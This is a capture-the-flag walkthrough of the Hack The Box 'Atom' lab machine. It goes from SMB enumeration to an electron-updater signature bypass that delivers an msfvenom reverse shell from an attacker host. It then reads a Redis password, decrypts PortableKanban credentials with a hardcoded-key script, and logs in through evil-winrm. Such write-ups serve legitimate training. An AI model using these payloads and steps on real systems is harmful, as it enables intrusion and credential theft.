HTB Atom

Initial_Recon

nmap -sV -sT -p- --min-rate 5000 10.129.230.162
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-17 16:58 EDT
Nmap scan report for 10.129.230.162
Host is up (0.036s latency).
Not shown: 65529 filtered tcp ports (no-response)
PORT STATE SERVICE
80/tcp open http Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
135/tcp open msrpc Microsoft Windows RPC
443/tcp open ssl/http Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
6379/tcp open redis Redis key-value store
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service_Recon

First, we look at the website to see whether there is anything interesting.
Atom website Screenshot
After looking through the website, we didn't find much of interest. It advertises Heed, a note-taking application, with macOS and Linux versions "coming soon"; only a Windows build is available. Hovering over the link to the Windows installer shows that the file is hosted in the website's Releases directory.
Atom - Releases folder
Since the site itself gives us little to work with, we move on to SMB. We can run the SMB enumeration NSE scripts against the host:
nmap --script "smb-enum-*" -p 445 10.129.230.162
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-17 17:32 EDT
Nmap scan report for atom (10.129.230.162)
Host is up (0.035s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
Host script results:
| smb-enum-shares:
| account_used: guest
| \\10.129.230.162\ADMIN$:
| Type: STYPE_DISKTREE_HIDDEN
| Comment: Remote Admin
| Anonymous access: <none>
| Current user access: <none>
| \\10.129.230.162\C$:
| Type: STYPE_DISKTREE_HIDDEN
| Comment: Default share
| Anonymous access: <none>
| Current user access: <none>
| \\10.129.230.162\IPC$:
| Type: STYPE_IPC_HIDDEN
| Comment: Remote IPC
| Anonymous access: <none>
| Current user access: READ/WRITE
| \\10.129.230.162\Software_Updates:
| Type: STYPE_DISKTREE
| Comment:
| Anonymous access: <none>
|_ Current user access: READ/WRITE
Nmap done: 1 IP address (1 host up) scanned in 40.34 seconds
Nmap is the port scanner used throughout this writeup: -sV fingerprints the service behind each open port, and its NSE scripts (here smb-enum-*) enumerate shares, users and sessions over SMB.
SMB (Server Message Block) is the Windows file and printer sharing protocol; IPC$ is the named-pipe share that enumeration tools use for RPC calls. The important line above is account_used: guest. Nmap got in without credentials because the host allows guest logons, and that guest account has READ/WRITE on Software_Updates.
The same shares can be enumerated with smbmap. Note that this is not a true null session (that would be an empty username and password): smbmap logs in as test/test and the host maps the unknown user to Guest.
smbmap -H 10.129.230.162 -u test -p test                          
    ________  ___      ___  _______   ___      ___       __         _______
   /"       )|"  \    /"  ||   _  "\ |"  \    /"  |     /""\       |   __ "\
  (:   \___/  \   \  //   |(. |_)  :) \   \  //   |    /    \      (. |__) :)
   \___  \    /\  \/.    ||:     \/   /\   \/.    |   /' /\  \     |:  ____/
    __/  \   |: \.        |(|  _  \  |: \.        |  //  __'  \    (|  /
   /" \   :) |.  \    /:  ||: |_)  :)|.  \    /:  | /   /  \   \  /|__/ \
  (_______/  |___|\__/|___|(_______/ |___|\__/|___|(___/    \___)(_______)
 -----------------------------------------------------------------------------
     SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com
                     https://github.com/ShawnDEvans/smbmap

[*] Detected 1 hosts serving SMB
[*] Established 1 SMB session(s)                                
                                                                                                    
[+] IP: 10.129.230.162:445	Name: atom                	Status: Authenticated
    Disk                                                  	Permissions	Comment
    ----                                                  	-----------	-------
    ADMIN$                                            	NO ACCESS	Remote Admin
    C$                                                	NO ACCESS	Default share
    IPC$                                              	READ ONLY	Remote IPC
    Software_Updates                                  	READ, WRITE	
smbmap lists the shares an account can see and the permission it holds on each, which is a quicker way than the nmap scripts to spot writable shares such as Software_Updates.
We then look at the contents of the Software_Updates share:
smbclient --no-pass //10.129.230.162/Software_Updates
Try "help" to get a list of possible commands.
smb: \> ls
 . D 0 Fri May 17 17:36:55 2024
 .. D 0 Fri May 17 17:36:55 2024
 client1 D 0 Fri May 17 17:36:55 2024
 client2 D 0 Fri May 17 17:36:55 2024
 client3 D 0 Fri May 17 17:36:55 2024
 UAT_Testing_Procedures.pdf A 35202 Fri Apr 9 07:18:08 2021
smbclient is the Samba command-line client; --no-pass connects without a password (a null/guest session), after which ls, get and put work much like an FTP client.
Download and read UAT_Testing_Procedures.pdf
smb: \> get UAT_Testing_Procedures.pdf
getting file \UAT_Testing_Procedures.pdf of size 35202 as UAT_Testing_Procedures.pdf (185.8 KiloBytes/sec) (average 185.8 KiloBytes/sec)
The document states that the application is built with electron-builder and explains how new builds are kicked off: the QA process starts as soon as a new update is placed in one of the client folders. Anything we write into those folders will therefore be picked up automatically, which makes the writable share the delivery channel for an update attack.

Foothold

To get a foothold we need a way to deliver a payload that the system will execute on its own. First, download the Windows installer and extract the zip; this produces a folder containing the uninstaller and a directory called '$PLUGINSDIR':
drwxr-xr-x 3 shabbadoo shabbadoo   4096 May 20 13:41  .
drwxr-xr-x 4 shabbadoo shabbadoo   4096 May 20 13:41  ..
drwxr-xr-x 2 shabbadoo shabbadoo   4096 May 20 13:41 '$PLUGINSDIR'
-rw-r--r-- 1 shabbadoo shabbadoo 135832 Apr  9  2021 'Uninstall heedv1.exe'
Inside '$PLUGINSDIR' are a few NSIS plugin DLLs (electron-builder packages its Windows installers with NSIS) and another archive, app-64.7z:
-rw-r--r-- 1 shabbadoo shabbadoo 46103281 Apr  9  2021 app-64.7z
-rw-r--r-- 1 shabbadoo shabbadoo   400384 Apr  9  2021 nsis7z.dll
-rw-r--r-- 1 shabbadoo shabbadoo     4608 Apr  9  2021 nsProcess.dll
-rw-r--r-- 1 shabbadoo shabbadoo     9216 Apr  9  2021 SpiderBanner.dll
-rw-r--r-- 1 shabbadoo shabbadoo   103424 Apr  9  2021 StdUtils.dll
-rw-r--r-- 1 shabbadoo shabbadoo    11776 Apr  9  2021 System.dll
-rw-r--r-- 1 shabbadoo shabbadoo     3072 Apr  9  2021 WinShell.dll 
Extracting app-64.7z and changing into its resources folder turns up two interesting files, app-update.yml and app.asar:
┌──(shabbadoo㉿kali)-[~/…/heed/$PLUGINSDIR/app-64/resources]
└─$ ls -l                         
total 3356
-rw-r--r--  1 shabbadoo shabbadoo 2994272 May 20 13:44 app.asar
-rw-r--r--  1 shabbadoo shabbadoo      79 May 20 13:44 app-update.yml
-rw-r--r--  1 shabbadoo shabbadoo  296356 May 20 13:44 electron.asar
-rw-r--r--  1 shabbadoo shabbadoo  114416 May 20 13:44 elevate.exe
drwxr-xr-x 69 shabbadoo shabbadoo    4096 May 20 13:44 inspector
drwxr-xr-x 16 shabbadoo shabbadoo    4096 May 20 14:03 node_modules
app-update.yml tells the updater where to pull updates from. Note the scheme: updates are fetched over plain HTTP, so the manifest's sha512 and the code-signature check are the only things standing between the updater and an attacker-supplied binary:
┌──(shabbadoo㉿kali)-[~/…/heed/$PLUGINSDIR/app-64/resources]
└─$ cat app-update.yml 
provider: generic
url: 'http://updates.atom.htb'
publisherName:
  - HackTheBox
app.asar is Electron's own archive format; the asar tool extracts it:
npx asar extract app.asar dest-dir
Listing dest-dir shows the unpacked application, including package.json:
┌──(shabbadoo㉿kali)-[~/…/$PLUGINSDIR/app-64/resources/dest-dir]
└─$ ls -la
total 32
drwxr-xr-x  4 shabbadoo shabbadoo 4096 May 20 14:09 .
drwxr-xr-x  5 shabbadoo shabbadoo 4096 May 20 14:09 ..
-rw-r--r--  1 shabbadoo shabbadoo 1135 May 20 14:09 createNote.html
drwxr-xr-x  2 shabbadoo shabbadoo 4096 May 20 14:09 icons
-rw-r--r--  1 shabbadoo shabbadoo 2574 May 20 14:09 main.js
drwxr-xr-x 26 shabbadoo shabbadoo 4096 May 20 14:09 node_modules
-rw-r--r--  1 shabbadoo shabbadoo  267 May 20 14:09 package.json
-rw-r--r--  1 shabbadoo shabbadoo 1660 May 20 14:09 version.html

package.json is the Node/Electron manifest: it names the entry point (main.js) and records the dependency ranges, so it is the quickest way to find out which versions of electron-updater and friends the app was built against.

package.json shows which version of electron-updater the application was built against: ^2.23.3, a release over six years old at the time of writing, while the current stable version when this post was written was 6.2.1.
┌──(shabbadoo㉿kali)-[~/…/$PLUGINSDIR/app-64/resources/dest-dir]
└─$ cat package.json
{
  "name": "heedv1",
  "version": "1.0.0",
  "main": "main.js",
  "description": "Open Source Application provided by HackTheBox",
  "author": "MrR3boot",
  "dependencies": {
    "electron-log": "^1.3.0",
    "electron-updater": "^2.23.3",
    "url": "^0.11.0"
  }
}
Electron bundles Chromium and Node.js so that a desktop app can be written in JavaScript, HTML and CSS and shipped for Windows, macOS and Linux from one codebase. The flip side is that the application logic ships as readable JavaScript inside app.asar, which is why unpacking it was so easy.
electron-updater is the auto-update component of electron-builder. It reads a latest.yml from the update URL, downloads the file it names, compares the sha512, and on Windows verifies the installer's code signature before running it.

Searching for this version turns up a published signature verification bypass in electron-updater. On Windows the updater downloads the file named in latest.yml, checks that its SHA-512 matches the sha512 field, and then validates the executable's Authenticode signature by spawning PowerShell with the downloaded file's path spliced into the command string. A single quote in the filename breaks that command; the resulting parse error was handled as "could not verify" and merely logged, not treated as a failed check, so an unsigned binary is accepted. The checksum is no obstacle because the attacker writes latest.yml and simply supplies the hash of the malicious file.
On this box the updater watches the client folders on the Software_Updates share, so dropping a crafted latest.yml into any of them is enough to trigger the download and execution.

First, create a reverse-shell payload with msfvenom. The single quote in the filename is deliberate:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.3 LPORT=4444 -f exe > "a'tom.exe"
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of exe file: 7168 bytes
msfvenom is the Metasploit payload generator; here it produces a stageless x64 Windows executable that connects back to our listener on port 4444.
Next, compute the SHA-512 of the payload and base64-encode the raw digest, which is the format electron-updater expects in the sha512 field of latest.yml:
shasum -a 512 "a'tom.exe" | cut -d " " -f1 | xxd -r -p | base64
Qdk9GLbxYATk99IYFpMGOgKzb/0dCfcQqRNi+2pnp3yNjX2uZtLdr7rcqkSzwh5b9H64iWo5V4pM01Z5OTtNPA==
Now write the latest.yml that points the updater at the payload. version must be higher than the installed 1.0.0 or the updater will not consider it an update:
version: 1.2.3
path: http://10.10.14.3/a'tom.exe
sha512: Qdk9GLbxYATk99IYFpMGOgKzb/0dCfcQqRNi+2pnp3yNjX2uZtLdr7rcqkSzwh5b9H64iWo5V4pM01Z5OTtNPA==
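To make the checksum and manifest steps above concrete, here is an added Python helper written for this writeup (it is not code from the box, from the original post or from electron-updater). It computes the sha512 field the way the updater expects, writes a latest.yml, and re-checks a "download" against it the way the updater does. It also reconstructs the shape of the PowerShell command the vulnerable updater used for Authenticode verification, to show why a single quote in the filename matters; that command string is reconstructed from the public description of the bug rather than copied from electron-updater, the payload bytes are a constructed placeholder, and C:\Temp is a hypothetical download location.

```python
"""latest.yml helpers for the electron-updater attack above.

Added example for this writeup (not code from the box or from electron-updater).
PAYLOAD is a constructed stand-in for the msfvenom executable.
"""
import base64
import hashlib

PAYLOAD = b"MZ" + b"\x90" * 62          # constructed placeholder, not a real PE
PAYLOAD_URL = "http://10.10.14.3/a'tom.exe"


def sha512_b64(data: bytes) -> str:
    """electron-updater stores the SHA-512 of the file as base64 (88 chars)."""
    return base64.b64encode(hashlib.sha512(data).digest()).decode()


def build_latest_yml(version: str, url: str, data: bytes) -> str:
    """Manifest the updater reads; on this box it is dropped into the SMB client folder."""
    return f"version: {version}\npath: {url}\nsha512: {sha512_b64(data)}\n"


def parse_latest_yml(text: str) -> dict:
    """Flat key: value parser, enough for the three fields we write (no PyYAML needed)."""
    manifest = {}
    for line in text.splitlines():
        key, sep, value = line.partition(":")
        if sep:
            manifest[key.strip()] = value.strip()
    return manifest


def checksum_matches(manifest: str, downloaded: bytes) -> bool:
    """The integrity check the updater really performs. It proves the download
    matches the manifest, but the attacker wrote the manifest, so it proves
    nothing about who built the file."""
    return parse_latest_yml(manifest)["sha512"] == sha512_b64(downloaded)


def vulnerable_signature_command(local_path: str) -> str:
    """Shape of the PowerShell command the old updater ran to check Authenticode
    (reconstructed): the temp file path is pasted into a single-quoted string."""
    return f"Get-AuthenticodeSignature '{local_path}' | ConvertTo-Json -Compress"


def hardened_signature_command(local_path: str) -> str:
    """Same command with the quote doubled, which is how PowerShell escapes a
    single quote inside a single-quoted string. One possible fix; the point is
    that the path must be escaped or passed as an argument, never spliced in."""
    escaped = local_path.replace("'", "''")
    return f"Get-AuthenticodeSignature '{escaped}' | ConvertTo-Json -Compress"


def quotes_balanced(command: str) -> bool:
    """An odd number of single quotes means a PowerShell parse error. In the
    vulnerable updater that error was logged and verification was skipped."""
    return command.count("'") % 2 == 0


if __name__ == "__main__":
    yml = build_latest_yml("1.2.3", PAYLOAD_URL, PAYLOAD)
    print(yml)
    print("checksum ok:", checksum_matches(yml, PAYLOAD))
    cmd = vulnerable_signature_command(r"C:\Temp\a'tom.exe")   # hypothetical local path
    print(cmd, "-> balanced:", quotes_balanced(cmd))
```

Run it as-is to print a manifest for the placeholder bytes, or swap PAYLOAD for the real file contents to reproduce the sha512 line above. The quotes_balanced check is a deliberately simple stand-in for PowerShell's parser: it is enough to show that the quote in a'tom.exe turns a valid command into a parse error, which is the whole bypass.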
Host the payload with Python's built-in HTTP server (binding port 80 needs root):
sudo python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
The next step is to set up a Netcat listener, which will catch the reverse shell when it is executed by the victim host.
sudo nc -lvnp 4444                                                    
listening on [any] 4444 ...
Netcat (nc) with -l listens on port 4444 (-p), -v reports incoming connections and -n skips DNS lookups; it is the simplest way to catch the reverse shell.
Upload latest.yml into one of the client folders on the Software_Updates share:
smbclient --no-pass //10.10.10.237/Software_Updates
Try "help" to get a list of possible commands.
smb: \> cd client1
smb: \client1\> put latest.yml
putting file latest.yml as \client1\latest.yml (1.5 kb/s) (average 1.5 kb/s)
After about a minute the updater pulled the payload and ran it, and the listener caught a shell as jason. In the web server log below, the 404 for a'tom.exe.blockmap is normal: the updater first tries a differential (blockmap) download and falls back to the full file. The quote reaches the server URL-encoded as %27 but is still present in the filename the updater saves locally, which is what breaks the signature check.
sudo python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.237 - - [20/May/2024 21:55:14] code 404, message File not found
10.10.10.237 - - [20/May/2024 21:55:14] "GET /a'tom.exe.blockmap HTTP/1.1" 404 -
10.10.10.237 - - [20/May/2024 21:55:14] "GET /a%27tom.exe HTTP/1.1" 200 -
sudo nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.237] 63920
Microsoft Windows [Version 10.0.19042.906]
(c) Microsoft Corporation. All rights reserved.
C:\WINDOWS\system32>whoami
whoami
atom\jason

Privesc

Looking around as jason, C:\Program Files\Redis holds the Redis installation, including the service configuration file redis.windows-service.conf:
C:\Program Files\Redis>dir
dir
Volume in drive C has no label.
Volume Serial Number is 9793-C2E6
Directory of C:\Program Files\Redis
05/20/2024  06:31 PM    <DIR>          .
05/20/2024  06:31 PM    <DIR>          ..
07/01/2016  03:54 PM             1,024 EventLog.dll
04/02/2021  07:31 AM    <DIR>          Logs
07/01/2016  03:52 PM            12,618 Redis on Windows Release Notes.docx
07/01/2016  03:52 PM            16,769 Redis on Windows.docx
07/01/2016  03:55 PM           406,016 redis-benchmark.exe
07/01/2016  03:55 PM         4,370,432 redis-benchmark.pdb
07/01/2016  03:55 PM           257,024 redis-check-aof.exe
07/01/2016  03:55 PM         3,518,464 redis-check-aof.pdb
07/01/2016  03:55 PM           268,288 redis-check-dump.exe
07/01/2016  03:55 PM         3,485,696 redis-check-dump.pdb
07/01/2016  03:55 PM           482,304 redis-cli.exe
07/01/2016  03:55 PM         4,517,888 redis-cli.pdb
07/01/2016  03:55 PM         1,553,408 redis-server.exe
07/01/2016  03:55 PM         6,909,952 redis-server.pdb
04/02/2021  07:39 AM            43,962 redis.windows-service.conf
04/02/2021  07:37 AM            43,960 redis.windows.conf
07/01/2016  09:17 AM            14,265 Windows Service Documentation.docx
              16 File(s)     25,902,070 bytes
               3 Dir(s)   5,598,461,952 bytes free

The Redis password (requirepass) is near the top of redis.windows-service.conf, which our low-privilege user can read:
C:\Program Files\Redis>type redis.windows-service.conf
type redis.windows-service.conf
# Redis configuration file example
requirepass kidvscat_yes_kidvscat
Redis is an in-memory key-value store. On this box it listens on 6379 externally (see the nmap scan) and is protected only by the requirepass value above, which sits in a configuration file jason can read.
With the password we can authenticate to Redis from our own machine (assuming atom.htb is mapped to the target in /etc/hosts) and list the keys. The pk:urn:user:e8e29158-d70d-44b1-a1ba-4949d52790a0 key holds a user record for Administrator containing an encrypted password, Odh7N3L9aVQ8/srdZgG2hIR0SSJoJKGi:
redis-cli -h atom.htb -p 6379 --pass kidvscat_yes_kidvscat
Warning: Using a password with '-a' or '-u' option on the command line interface may not be safe.
atom.htb:6379> keys *
1) "pk:ids:MetaDataClass"
2) "pk:urn:metadataclass:ffffffff-ffff-ffff-ffff-ffffffffffff"
3) "pk:ids:User"
4) "pk:urn:user:e8e29158-d70d-44b1-a1ba-4949d52790a0"
atom.htb:6379> get pk:urn:user:e8e29158-d70d-44b1-a1ba-4949d52790a0
"{\"Id\":\"e8e29158d70d44b1a1ba4949d52790a0\",\"Name\":\"Administrator\",\"Initials\":\"\",\"Email\":\"\",\"EncryptedPassword\":\"Odh7N3L9aVQ8/srdZgG2hIR0SSJoJKGi\",\"Role\":\"Admin\",\"Inactive\":false,\"TimeStamp\":637530169606440253}"
atom.htb:6379>
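What redis-cli is doing on the wire, as an added example written for this writeup (not code from the box, from redis-cli or from PortableKanban): the commands above encoded as RESP, and a reply decoded into the user record. The KEYS and GET replies below are constructed from the redis-cli output above rather than captured live; fetch_user() shows the same functions against a real server but is not exercised offline. Two things the session above hides: AUTH carries the password in cleartext on 6379 (there is no TLS here), and --pass on the command line also ends up in shell history and process listings, which is what redis-cli's own warning is about.

```python
"""Hand-rolled RESP for the Redis step above.

Added example for this writeup, not code from the box, redis-cli or PortableKanban.
SAMPLE_* values are constructed from the redis-cli output shown above.
"""
import json
import socket


def encode_command(*args: str) -> bytes:
    """Encode a command as a RESP array of bulk strings. This is exactly what
    redis-cli sends; note that AUTH <password> goes out in cleartext."""
    parts = [f"*{len(args)}\r\n".encode()]
    for arg in args:
        raw = arg.encode()
        parts.append(b"$%d\r\n%s\r\n" % (len(raw), raw))
    return b"".join(parts)


def decode_reply(buf: bytes):
    """Decode one RESP reply. Returns (value, remaining_bytes).
    Handles simple strings (+), errors (-), integers (:), bulk ($) and arrays (*)."""
    kind, rest = buf[:1], buf[1:]
    line, _, rest = rest.partition(b"\r\n")
    if kind == b"+":
        return line.decode(), rest
    if kind == b"-":
        raise RuntimeError(line.decode())          # e.g. NOAUTH / WRONGPASS
    if kind == b":":
        return int(line), rest
    if kind == b"$":
        length = int(line)
        if length < 0:
            return None, rest                      # null bulk: key does not exist
        return rest[:length].decode(), rest[length + 2:]
    if kind == b"*":
        items = []
        for _ in range(int(line)):
            item, rest = decode_reply(rest)
            items.append(item)
        return items, rest
    raise ValueError(f"unexpected RESP prefix {kind!r}")


def user_record(bulk: str) -> dict:
    """PortableKanban stores each user as one JSON document under pk:urn:user:<id>."""
    return json.loads(bulk)


# Constructed replies, matching the redis-cli session above.
SAMPLE_USER_JSON = (
    '{"Id":"e8e29158d70d44b1a1ba4949d52790a0","Name":"Administrator","Initials":"",'
    '"Email":"","EncryptedPassword":"Odh7N3L9aVQ8/srdZgG2hIR0SSJoJKGi","Role":"Admin",'
    '"Inactive":false,"TimeStamp":637530169606440253}'
)
SAMPLE_GET_REPLY = b"$%d\r\n%s\r\n" % (len(SAMPLE_USER_JSON), SAMPLE_USER_JSON.encode())
SAMPLE_KEYS_REPLY = encode_command(   # a KEYS reply uses the same array-of-bulk encoding
    "pk:ids:MetaDataClass",
    "pk:urn:metadataclass:ffffffff-ffff-ffff-ffff-ffffffffffff",
    "pk:ids:User",
    "pk:urn:user:e8e29158-d70d-44b1-a1ba-4949d52790a0",
)


def _recv_reply(sock: socket.socket) -> bytes:
    """Read one reply; for bulk strings keep reading until the declared length arrives."""
    data = sock.recv(65536)
    if data.startswith(b"$") and not data.startswith(b"$-"):
        header, _, _ = data.partition(b"\r\n")
        need = len(header) + 2 + int(header[1:]) + 2
        while len(data) < need:
            data += sock.recv(65536)
    return data


def fetch_user(host: str, password: str, key: str, port: int = 6379) -> dict:
    """Live version of the session above (not run offline): AUTH, then GET the record."""
    with socket.create_connection((host, port), timeout=5) as sock:
        sock.sendall(encode_command("AUTH", password))
        decode_reply(_recv_reply(sock))            # "+OK", or raises on a bad password
        sock.sendall(encode_command("GET", key))
        doc, _ = decode_reply(_recv_reply(sock))
        return user_record(doc)


if __name__ == "__main__":
    keys, _ = decode_reply(SAMPLE_KEYS_REPLY)
    rec = user_record(decode_reply(SAMPLE_GET_REPLY)[0])
    print(keys)
    print(rec["Name"], rec["Role"], rec["EncryptedPassword"])
```

Running it offline prints the four keys and the Administrator record; fetch_user("atom.htb", "kidvscat_yes_kidvscat", "pk:urn:user:e8e29158-d70d-44b1-a1ba-4949d52790a0") would do the same against the box. Seeing the AUTH frame as bytes makes the point better than any warning: anyone on the path between attacker and target, or anyone who can read jason's shell history, gets the Redis password for free.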

If we download User_Guide.pdf from jason's Downloads folder and read it, we find that PortableKanban stores its settings and user passwords in encrypted form, which explains the pk:urn:user record we pulled from Redis. Since administrators frequently reuse passwords, we check whether the PortableKanban Administrator password is also the local Administrator's.
PortableKanban is a small Windows kanban/task-tracking application. As the exploit below shows, its password "encryption" is DES with a key and IV hardcoded in the program, so anyone who can read the ciphertext can recover the plaintext.
A search for PortableKanban exploits finds a published Exploit-DB entry, and several people have written Python scripts based on it to decrypt PortableKanban passwords:
#!/usr/bin/python3
# Decrypt a PortableKanban password: DES in CBC mode with the key and IV
# hardcoded in the application (values from Exploit-DB 49409).
import base64
import sys
from des import DesKey   # python3 -m pip install des

# Encrypted password taken from the Redis user record (or pass one as argv[1])
pk_hash = sys.argv[1] if len(sys.argv) > 1 else "Odh7N3L9aVQ8/srdZgG2hIR0SSJoJKGi"
ciphertext = base64.b64decode(pk_hash.encode("utf-8"))
key = DesKey(b"7ly6UznJ")
# initial= selects CBC with the hardcoded IV; padding=True strips the PKCS#7 padding
plaintext = key.decrypt(ciphertext, initial=b"XuVUm5fR", padding=True).decode("utf-8")
print(plaintext)
Link to exploit: https://www.exploit-db.com/exploits/49409
Running the script prints the decrypted password:
kidvscat_admin_@123
With that password we can log in over WinRM (port 5985 from the initial scan) using evil-winrm:
evil-winrm -i 10.10.10.237 -u 'administrator' -p 'kidvscat_admin_@123'                   
Evil-WinRM shell v3.5                      
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
atom\administrator

evil-winrm is a WinRM shell client. With valid credentials it gives an interactive PowerShell session on the target, plus built-in upload and download helpers, without having to drop another reverse shell.
